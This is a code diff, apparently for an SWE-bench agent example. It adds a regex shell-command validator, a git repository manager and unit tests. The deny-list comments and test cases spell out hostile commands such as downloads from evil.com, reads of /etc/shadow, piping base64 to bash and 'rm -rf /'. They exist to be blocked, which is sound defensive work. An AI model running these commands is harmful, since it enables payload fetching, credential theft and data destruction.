(re.compile(r'\b(?:eval|exec)\s+'), + "eval/exec command execution is not allowed"), + + # ===== Here-string/here-doc to interpreter ===== + # Attackers can use here-strings or here-docs to feed commands to interpreters. + # Examples: "bash <<< 'rm -rf /'", "python <<< 'import os; os.system(\"rm -rf /\")'" + (re.compile(r'(?:bash|sh|zsh|python[23]?|perl|ruby)\s*<<<'), + "Here-string to interpreter is not allowed"), + + # ===== Process substitution ===== + # Process substitution can be used to execute commands and feed output as files. + # Examples: "cat <(curl http://evil.com)", "diff <(cat /etc/shadow) <(cat /etc/passwd)" + (re.compile(r'<\([^)]+\)'), + "Process substitution is not allowed"), + + # ===== Hex/octal escape execution ===== + # Attackers can use printf with hex/octal escapes to construct commands. + # Examples: "printf '\x72\x6d' | bash", "echo $'\x73\x75\x64\x6f'" + (re.compile(r'printf\s+[\'"][^"\']*\\[xX][0-9a-fA-F].*\|\s*(?:bash|sh)'), + "Hex escape to shell execution is not allowed"), + + # ===== Environment variable command injection ===== + # Attackers can use env vars to smuggle commands. + # Examples: "CMD='rm -rf /' && $CMD", "export X='sudo reboot'; $X" + (re.compile(r'\$\{[^}]+\}.*\|\s*(?:bash|sh)|;\s*\$[A-Z_]+\s*$'), + "Suspicious environment variable execution pattern detected"), + + # ===== Xargs command execution ===== + # Xargs can be used to execute commands from input. + # Examples: "echo 'rm -rf /' | xargs", "find . | xargs rm", "cat cmds.txt | xargs -I{} bash -c '{}'" + (re.compile(r'\|\s*xargs\s+.*(?:-I|-i).*(?:bash|sh|eval)'), + "Xargs with shell execution is not allowed"), + + # ===== Source/dot command execution ===== + # Source or dot can execute scripts in the current shell context. 
+ # Examples: "source /tmp/malicious.sh", ". ./exploit.sh", "source <(curl url)" + (re.compile(r'(?:^|[;&|]\s*)(?:source|\.)[ \t]+'), + "source/dot command execution is not allowed"), +] + + +def validate_command(command: str) -> tuple[bool, str]: + """Validate that a command is safe to execute. + + Checks against two pattern lists: + 1. DANGEROUS_PATTERNS: Direct dangerous commands (rm -rf /, sudo, etc.) + 2. BYPASS_PATTERNS: Shell metacharacter tricks that could evade command filtering + + Args: + command: The bash command string to validate. + + Returns: + A tuple of (is_valid, error_message). + is_valid is True if the command passes all safety checks. + error_message is empty string if valid, otherwise describes the violation. + """ + # Check dangerous command patterns + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + + # Check bypass/evasion patterns + for pattern, message in BYPASS_PATTERNS: + if pattern.search(command): + return False, message + + return True, "" diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py new file mode 100644 index 0000000000..bcd923c929 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py new file mode 100644 index 0000000000..77b0bcdb87 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -0,0 +1,208 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
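+
+# Illustrative usage of the RepoManager defined below (a sketch; the repository
+# URL, commit, and instance_id values are hypothetical):
+#
+#   manager = RepoManager("./.workspace")
+#   ctx = await manager.setup_repository(
+#       "https://github.com/org/repo", base_commit="abc123", instance_id="org__repo-1")
+#   # ... run commands inside ctx.repo_path ...
+#   await manager.cleanup()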
+ +import asyncio +import logging +import os +import shutil +from dataclasses import dataclass +from pathlib import Path +from urllib.parse import urlparse + +from git import Repo + +logger = logging.getLogger(__name__) + + +@dataclass +class RepoContext: + """Context manager for repository operations.""" + repo_url: str + repo_path: Path # Actual path where the repo is cloned + repo: Repo | None = None + + +class RepoManager: + """Manages git repository cloning and cleanup for SWE-bench instances.""" + + def __init__(self, workspace_dir: str): + """Initialize the repository manager. + + Args: + workspace_dir: Base directory for cloning repositories. + """ + self.workspace = Path(workspace_dir) + self.workspace.mkdir(parents=True, exist_ok=True) + self.active_repos = {} + + async def setup_repository( + self, repo_url: str, base_commit: str, instance_id: str | None = None + ) -> RepoContext: + """Setup a repository at a specific commit. + + Args: + repo_url: URL of the repository to clone. + base_commit: Commit hash to checkout. + instance_id: Optional instance ID for workspace isolation. When provided, + each instance gets its own clean workspace directory. + + Returns: + RepoContext containing the repository path and Repo object. + + Raises: + ValueError: If the repository URL is invalid. + asyncio.TimeoutError: If clone or checkout times out. + """ + repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) + + if str(repo_path) in self.active_repos: + context = self.active_repos[str(repo_path)] + await checkout_commit(context.repo, base_commit) + return context + + repo = await clone_repository(repo_url, repo_path) + await checkout_commit(repo, base_commit) + + context = RepoContext(repo_url=repo_url, repo_path=repo_path, repo=repo) + self.active_repos[str(repo_path)] = context + return context + + async def cleanup(self) -> None: + """Clean up all managed repositories. + + Removes all cloned repository directories and clears the active repos cache. + """ + for repo_path_str in list(self.active_repos.keys()): + repo_path = Path(repo_path_str) + if repo_path.exists(): + await asyncio.to_thread(shutil.rmtree, repo_path) + self.active_repos.clear() + + +def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = None) -> Path: + """Generate a unique path for the repository. + + Args: + workspace_dir: Base workspace directory + repo_url: URL of the repository + instance_id: Optional instance ID for unique workspace isolation + + Returns: + Path to the repository. If instance_id is provided, returns + workspace_dir/instance_id/org/repo for complete isolation. + Otherwise returns workspace_dir/org/repo. + + Raises: + ValueError: If instance_id contains path traversal characters or repo_url is malformed. + """ + # Sanitize instance_id to prevent path traversal attacks + if instance_id: + if ".." 
in instance_id or "/" in instance_id or "\\" in instance_id: + raise ValueError(f"Invalid instance_id: contains path traversal characters: {instance_id}") + + # Parse repo URL to extract org and repo names + if "://" in repo_url: + path = urlparse(repo_url).path + else: + # SSH form: git@host:org/repo.git + path = repo_url.split(":", 1)[-1] + + parts = path.strip("/").split("/") + if len(parts) < 2: + raise ValueError(f"Invalid repo_url: cannot extract org/repo from: {repo_url}") + + repo_name = parts[-1].replace('.git', '') + org_name = parts[-2] + + # Validate extracted names are not empty + if not org_name or not repo_name: + raise ValueError(f"Invalid repo_url: empty org or repo name from: {repo_url}") + + # If instance_id is provided, create isolated workspace per instance + if instance_id: + return Path(workspace_dir) / instance_id / org_name / repo_name + + # Default: workspace_dir/org/repo + return Path(workspace_dir) / org_name / repo_name + + +async def clone_repository(repo_url: str, target_path: Path, timeout: int = 600) -> Repo: + """Clone a repository with timeout and error handling. + + Args: + repo_url: URL of the repository to clone. + target_path: Local path to clone into. + timeout: Maximum time in seconds for clone operation. + + Returns: + The cloned Repo object. + + Raises: + ValueError: If repo_url format is invalid. + asyncio.TimeoutError: If clone exceeds timeout. + """ + logger.info("Cloning repository %s to %s", repo_url, target_path) + + # Validate URL format + if not (repo_url.startswith('https://') or repo_url.startswith('git@')): + raise ValueError(f"Invalid repository URL: {repo_url}") + + # Clean existing path + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + + try: + repo = await asyncio.wait_for( + asyncio.to_thread(Repo.clone_from, repo_url, target_path), + timeout=timeout + ) + logger.info("Successfully cloned %s", repo_url) + return repo + except asyncio.TimeoutError: + logger.error("Clone timed out for %s after %ds", repo_url, timeout) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + except Exception as e: + logger.error("Clone failed for %s: %s", repo_url, e) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + + +async def checkout_commit(repo: Repo, commit_hash: str, timeout: int = 120): + """Checkout a specific commit with timeout and error handling. + + Args: + repo: The repository object. + commit_hash: The commit hash to checkout. + timeout: Maximum time in seconds for checkout operation. + + Raises: + asyncio.TimeoutError: If checkout exceeds timeout. 
+ """ + logger.info("Checking out commit %s", commit_hash) + try: + await asyncio.wait_for( + asyncio.to_thread(repo.git.checkout, commit_hash), + timeout=timeout + ) + logger.info("Successfully checked out %s", commit_hash) + except asyncio.TimeoutError: + logger.error("Checkout timed out for %s after %ds", commit_hash, timeout) + raise + except Exception as e: + logger.error("Checkout failed for %s: %s", commit_hash, e) + raise diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py new file mode 100644 index 0000000000..d0facf41c4 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -0,0 +1,100 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# Register all the tools needed by the full predictor without loading the dependencies. +import logging +import typing + +from nat.builder.builder import Builder +from nat.builder.function_info import FunctionInfo +from nat.cli.register_workflow import register_function +from nat.data_models.function import FunctionBaseConfig + +logger = logging.getLogger(__name__) + + +class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): + """Configuration for git repository management tool.""" + _type: typing.Literal["git_repo_tool"] = "git_repo_tool" + workspace_dir: str = "./.workspace" # Base directory for cloning repositories + cleanup_on_exit: bool = True # Whether to clean up repos after use + + +@register_function(config_type=GitRepoToolConfig) +async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): + """Git repository management tool for SWE Bench. + + Args: + tool_config: Configuration for the git tool. + builder: NAT builder instance. + + Yields: + FunctionInfo for the git_operations function. + """ + import json + + from .git_tool import RepoManager + repo_manager = RepoManager(tool_config.workspace_dir) + + async def git_operations(args_str: str) -> str: + """Perform git operations based on JSON input. + + Args: + args_str: JSON string with 'operation' and operation-specific parameters. + Supported operations: + - setup: requires 'repo_url', 'base_commit', optional 'instance_id' + - cleanup: no additional parameters + + Returns: + For 'setup': the repository path as a string. + For 'cleanup': "Cleanup complete". + + Raises: + ValueError: If JSON is invalid or operation is unknown. 
+ """ + try: + args = json.loads(args_str) + except json.JSONDecodeError as e: + raise ValueError(f"Invalid JSON input: {e}") from e + + operation = args.get('operation') + + if operation == "setup": + if 'repo_url' not in args or 'base_commit' not in args: + raise ValueError("setup operation requires 'repo_url' and 'base_commit'") + # instance_id is optional - when provided, creates isolated workspace per instance + instance_id = args.get('instance_id') + context = await repo_manager.setup_repository( + args['repo_url'], args['base_commit'], instance_id + ) + return str(context.repo_path) + + if operation == "cleanup": + await repo_manager.cleanup() + return "Cleanup complete" + + raise ValueError(f"Unknown operation: {operation}. Supported: 'setup', 'cleanup'") + + try: + yield FunctionInfo.from_fn(git_operations, + description="Git repository management tool that accepts JSON string arguments") + finally: + if tool_config.cleanup_on_exit: + try: + await repo_manager.cleanup() + logger.info("Workspace cleanup completed successfully") + except Exception as e: + logger.error("Workspace cleanup failed: %s", e, exc_info=True) + # Don't raise - allow graceful degradation diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py index 61e8f1a469..afa1861eea 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py @@ -17,3 +17,4 @@ # Import the predictor classes to register them from nat_swe_bench.predictors.predict_gold.predict_gold_stub import SweBenchPredictor as GoldPredictor +from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor as IterativePredictor diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py index ef10ebc8aa..7ef908ebf8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py @@ -16,3 +16,4 @@ # flake8: noqa: F401, pylint: disable=unused-import # imports tools to register them +from nat_swe_bench.predictors.predict_iterative.tools.register import git_repo_tool diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py new file mode 100644 index 0000000000..0eaeadc9d3 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -0,0 +1,774 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +"""Unit tests for the iterative predictor.""" + +import asyncio +import subprocess +from unittest.mock import AsyncMock +from unittest.mock import MagicMock +from unittest.mock import patch + +import pytest + +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ExecutionTimeoutError +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgent +from nat_swe_bench.predictors.predict_iterative.predict_iterative import IterativeAgentConfig +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command + +# ============================================================================= +# Fixtures +# ============================================================================= + +@pytest.fixture(name="mock_llm") +def fixture_mock_llm(): + """Create a mock LLM that returns configurable responses.""" + llm = AsyncMock() + return llm + + +@pytest.fixture(name="agent_config") +def fixture_agent_config(): + """Create a default agent configuration for testing.""" + return IterativeAgentConfig( + step_limit=10, + timeout=5, + max_output_length=1000 + ) + + +@pytest.fixture(name="temp_repo_path") +def fixture_temp_repo_path(tmp_path): + """Create a temporary directory to simulate a repository.""" + repo_path = tmp_path / "test_repo" + repo_path.mkdir() + return repo_path + + +@pytest.fixture(name="agent") +def fixture_agent(mock_llm, temp_repo_path, agent_config): + """Create an IterativeAgent instance with mocked dependencies.""" + return IterativeAgent(mock_llm, temp_repo_path, agent_config) + + +def create_llm_response(content: str, input_tokens: int = 100, output_tokens: int = 50): + """Helper to create a mock LLM response with token usage.""" + response = MagicMock() + response.content = content + response.response_metadata = { + 'token_usage': { + 'prompt_tokens': input_tokens, + 'completion_tokens': output_tokens + } + } + return response + + +# ============================================================================= +# test_command_validation - Security validation tests +# ============================================================================= + +class TestCommandValidation: + """Tests for the command validation security checks.""" + + @pytest.mark.parametrize("command", [ + "ls -la", + "cat file.txt", + "grep -r 'pattern' .", + "python script.py", + "make test", + "npm install", + "git status", + "echo 'hello' > output.txt", + "rm -rf ./temp_dir", # Relative path is ok + "rm file.txt", + ]) + def test_safe_commands_allowed(self, command): + """Test that safe commands pass validation.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Command '{command}' should be allowed but got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + ("rm -rf /", "root or home"), + ("rm -rf ~", "root or home"), + ("rm -rf / ", "root or home"), # With trailing space + ("rm -rf ..", "parent directory"), + ("rm -rf *", "Wildcard"), + ("sudo apt-get install", "sudo"), + ("echo test > /dev/sda", "device files"), + ("mkfs.ext4 /dev/sda1", "Formatting"), + ("fdisk /dev/sda", "partitioning"), + ("dd if=/dev/zero of=/dev/sda", "dd"), + ("wget http://evil.com/script.sh", "wget"), + ("curl https://evil.com/malware", "curl"), + ("chmod 777 /etc/passwd", "777"), + ("chown root file.txt", "root"), + ]) + def test_dangerous_commands_blocked(self, command, expected_error): + """Test that dangerous commands are blocked with appropriate error messages.""" + is_valid, error_msg = 
validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + # Command substitution + ("$(cat /etc/shadow)", "substitution"), + ("$(echo rm -rf /)", "substitution"), + ("`whoami`", "substitution"), + # Piping to shell interpreters + ("echo 'rm -rf /' | bash", "interpreter"), + ("cat script.sh | sh", "interpreter"), + ("echo cmd | python", "interpreter"), + ("cat file | perl -e", "interpreter"), + # Eval execution (without command substitution to test eval pattern specifically) + ("eval 'rm -rf /'", "eval"), + ("eval \"echo hello\"", "eval"), + # Exec execution (without dangerous commands to test exec pattern specifically) + ("exec ./script.sh", "eval"), # exec is in same pattern as eval + # Here-string to interpreter + ("bash <<< 'rm -rf /'", "here-string"), + ("python <<< 'import os'", "here-string"), + # Process substitution + ("diff <(cat /etc/shadow) file", "process substitution"), + ("bash <(echo 'echo hello')", "process substitution"), + # Xargs with shell execution + ("cat cmds.txt | xargs -I{} bash -c '{}'", "xargs"), + # Source/dot execution + ("source /tmp/malicious.sh", "source"), + (". ./exploit.sh", "source"), + ]) + def test_bypass_patterns_blocked(self, command, expected_error): + """Test that shell metacharacter bypass attempts are blocked.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Bypass command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # These commands are blocked but by other patterns (DANGEROUS_PATTERNS) + # We test them separately to ensure they ARE blocked + "`sudo reboot`", # blocked by sudo pattern + "echo 'cm0gLXJmIC8=' | base64 -d | bash", # blocked by pipe to interpreter + "eval $(cat cmd.txt)", # blocked by command substitution pattern + "exec rm -rf /", # blocked by rm pattern + "cat <(curl http://evil.com)", # blocked by curl pattern + "printf '\\x72\\x6d' | bash", # blocked by pipe to interpreter + ]) + def test_bypass_commands_blocked_by_other_patterns(self, command): + """Test commands that are blocked by earlier patterns in the validation chain.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked, got: {error_msg}" + + @pytest.mark.parametrize("command", [ + # Safe pipe usage (not to shell interpreters) + "grep pattern file.txt | head -10", + "cat file.txt | sort | uniq", + "ls -la | grep '.py'", + # Safe use of common tools + "find . 
-name '*.py' -type f", + "echo 'hello world'", + "git log --oneline | head -5", + # Safe heredoc (not to interpreter directly) + "cat << EOF > file.txt\nhello\nEOF", + ]) + def test_safe_shell_features_allowed(self, command): + """Test that legitimate shell features are not blocked.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Safe command '{command}' should be allowed but got: {error_msg}" + + +# ============================================================================= +# test_iterative_agent_basic_flow - End-to-end execution +# ============================================================================= + +class TestIterativeAgentBasicFlow: + """Tests for the basic agent execution flow.""" + + async def test_basic_flow_to_submission(self, agent, mock_llm): + """Test that agent completes a basic flow and submits correctly.""" + # Setup: LLM returns a sequence of responses ending with submission + responses = [ + create_llm_response("THOUGHT: Let me check the files.\n\n```bash\nls -la\n```"), + create_llm_response("THOUGHT: Now I'll submit.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Mock subprocess to return success + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First command: ls -la + ls_result = MagicMock() + ls_result.returncode = 0 + ls_result.stdout = "file1.py\nfile2.py\n" + + # Second command: submission + submit_result = MagicMock() + submit_result.returncode = 0 + submit_result.stdout = "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/file.py b/file.py\n+fixed line" + + mock_thread.side_effect = [ls_result, submit_result] + + exit_status, result = await agent.run("Fix the bug in file.py") + + assert exit_status == "Submitted" + assert "diff" in result or "COMPLETE_TASK" in result + assert agent.n_steps == 2 + + async def test_token_accumulation(self, agent, mock_llm): + """Test that tokens are correctly accumulated across steps.""" + responses = [ + create_llm_response("THOUGHT: Step 1\n\n```bash\nls\n```", input_tokens=100, output_tokens=50), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```", input_tokens=200, output_tokens=100), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + result1 = MagicMock(returncode=0, stdout="output") + result2 = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + mock_thread.side_effect = [result1, result2] + + await agent.run("Test task") + + assert agent.total_input_tokens == 300 # 100 + 200 + assert agent.total_output_tokens == 150 # 50 + 100 + + async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): + """Test that agent stops when step limit is reached.""" + config = IterativeAgentConfig(step_limit=2, timeout=5) + agent = IterativeAgent(mock_llm, temp_repo_path, config) + + # LLM always returns a valid command but never submits + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Working\n\n```bash\nls\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="output") + + exit_status, result = await agent.run("Task") + + assert 
exit_status == "LimitsExceeded" + assert "step limit" in result.lower() + + +# ============================================================================= +# test_format_error_recovery - LLM output validation +# ============================================================================= + +class TestFormatErrorRecovery: + """Tests for handling malformed LLM responses.""" + + async def test_recovery_from_no_bash_block(self, agent, mock_llm): + """Test that agent recovers when LLM doesn't include a bash block.""" + responses = [ + # First response: no bash block + create_llm_response("THOUGHT: I'm thinking about this problem..."), + # Second response: proper bash block + create_llm_response("THOUGHT: Now I'll run a command.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + assert agent.n_steps == 2 # First step failed format, second succeeded + + async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): + """Test that agent recovers when LLM includes multiple bash blocks.""" + responses = [ + # First response: multiple bash blocks + create_llm_response("```bash\nls\n```\n\n```bash\ncat file.txt\n```"), + # Second response: single bash block + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + async def test_recovery_from_dangerous_command(self, agent, mock_llm): + """Test that agent recovers when LLM suggests a dangerous command.""" + responses = [ + # First response: dangerous command + create_llm_response("THOUGHT: Delete everything\n\n```bash\nrm -rf /\n```"), + # Second response: safe command + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + +# ============================================================================= +# test_timeout_handling - Command timeout scenarios +# ============================================================================= + +class TestTimeoutHandling: + """Tests for command execution timeout handling.""" + + async def test_command_timeout_recovery(self, agent, mock_llm): + """Test that agent recovers from a command timeout.""" + responses = [ + create_llm_response("THOUGHT: Run slow command\n\n```bash\nsleep 100\n```"), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff 
--cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First call: timeout + mock_thread.side_effect = [ + subprocess.TimeoutExpired(cmd="sleep 100", timeout=5), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch"), + ] + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + async def test_timeout_message_includes_command(self, agent, mock_llm): + """Test that timeout error message includes the timed-out command.""" + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Slow\n\n```bash\nsleep 999\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.side_effect = subprocess.TimeoutExpired(cmd="sleep 999", timeout=5) + + # Run one step - it will timeout and add error message + agent.add_message("system", "test") + agent.add_message("user", "test") + agent.n_steps = 1 + + response = await agent._query_llm() + + with pytest.raises(ExecutionTimeoutError) as exc_info: + await agent._execute_action(response) + + assert "sleep 999" in str(exc_info.value) + + +# ============================================================================= +# test_workspace_isolation - Concurrent instance isolation +# ============================================================================= + +class TestWorkspaceIsolation: + """Tests for workspace isolation between instances.""" + + def test_different_instance_ids_get_different_paths(self, tmp_path): + """Test that different instance_ids produce different workspace paths.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") + path2 = get_repo_path(workspace, repo_url, instance_id="instance-002") + + assert path1 != path2 + assert "instance-001" in str(path1) + assert "instance-002" in str(path2) + + def test_same_instance_id_gets_same_path(self, tmp_path): + """Test that the same instance_id always produces the same path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + instance_id = "instance-001" + + path1 = get_repo_path(workspace, repo_url, instance_id=instance_id) + path2 = get_repo_path(workspace, repo_url, instance_id=instance_id) + + assert path1 == path2 + + def test_no_instance_id_uses_default_path(self, tmp_path): + """Test that no instance_id uses the default org/repo path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/myorg/myrepo" + + path = get_repo_path(workspace, repo_url, instance_id=None) + + assert str(path) == f"{workspace}/myorg/myrepo" + + def test_ssh_url_parsing(self, tmp_path): + """Test that SSH URLs are correctly parsed.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "git@github.com:org/repo.git" + + path = get_repo_path(workspace, repo_url, instance_id="test-123") + + assert "org" in str(path) + assert "repo" in str(path) + + @pytest.mark.parametrize("invalid_instance_id", [ + "../escape", + 
"foo/../bar", + "foo/bar", + "foo\\bar", + "..\\escape", + ]) + def test_instance_id_path_traversal_blocked(self, tmp_path, invalid_instance_id): + """Test that path traversal in instance_id is rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + repo_url = "https://github.com/org/repo" + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, repo_url, instance_id=invalid_instance_id) + + assert "path traversal" in str(exc_info.value).lower() + + @pytest.mark.parametrize("invalid_url", [ + "not-a-url", + "https://github.com/", + "https://github.com", + "", + ]) + def test_malformed_repo_url_rejected(self, tmp_path, invalid_url): + """Test that malformed repo URLs are rejected.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = str(tmp_path / "workspace") + + with pytest.raises(ValueError) as exc_info: + get_repo_path(workspace, invalid_url) + + assert "invalid" in str(exc_info.value).lower() + + +# ============================================================================= +# test_repo_setup_and_checkout - Git operations +# ============================================================================= + +class TestRepoSetupAndCheckout: + """Tests for git repository setup and checkout operations.""" + + async def test_clone_repository_success(self, tmp_path): + """Test successful repository cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + 